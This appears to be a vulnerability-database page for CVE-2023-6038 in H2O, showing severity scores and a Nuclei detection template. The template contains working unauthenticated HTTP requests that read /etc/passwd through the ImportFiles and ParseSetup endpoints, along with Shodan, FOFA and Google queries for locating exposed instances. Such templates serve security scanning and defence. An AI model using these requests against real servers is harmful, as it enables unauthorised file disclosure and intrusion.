Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-6038
HistoryDec 20, 2023 - 6:19 p.m.

H2O ImportFiles - Local File Inclusion

2023-12-2018:19:16
ProjectDiscovery
github.com
40
cve
h2o-3
ml
file inclusion
security
authentication

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

0.071 Low

EPSS

Percentile

94.0%

An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.
id: CVE-2023-6038

info:
  name: H2O ImportFiles - Local File Inclusion
  author: danmcinerney,byt3bl33d3r
  severity: high
  description: |
    An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.
  reference:
    - https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-6038
    - https://github.com/h2o/h2o
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-6038
    cwe-id: CWE-862
    epss-score: 0.06351
    epss-percentile: 0.93636
    cpe: cpe:2.3:a:h2o:h2o:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: h2o
    product: h2o
    shodan-query:
      - title:"H2O Flow"
      - http.title:"h2o flow"
    fofa-query: title="h2o flow"
    google-query: intitle:"h2o flow"
  tags: cve,cve2023,h2o-3,h2o,ml

http:
  - raw:
      - |
        GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /3/ParseSetup HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'ImportFilesV3')"
          - "regex('root:.*:0:0:', body_2)"
          - "status_code_2 == 200"
        condition: and
# digest: 4a0a00473045022100bbca674fd6eedb1264de3b9612164d3bf6f1b70a3bb7d87303eb499e52fa1f3e02200be4bf6e50b284676c440a392ba0bc467b410019a2d066f93ad9cdce0c734694:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.5 High

AI Score

Confidence

High

0.071 Low

EPSS

Percentile

94.0%

Related for NUCLEI:CVE-2023-6038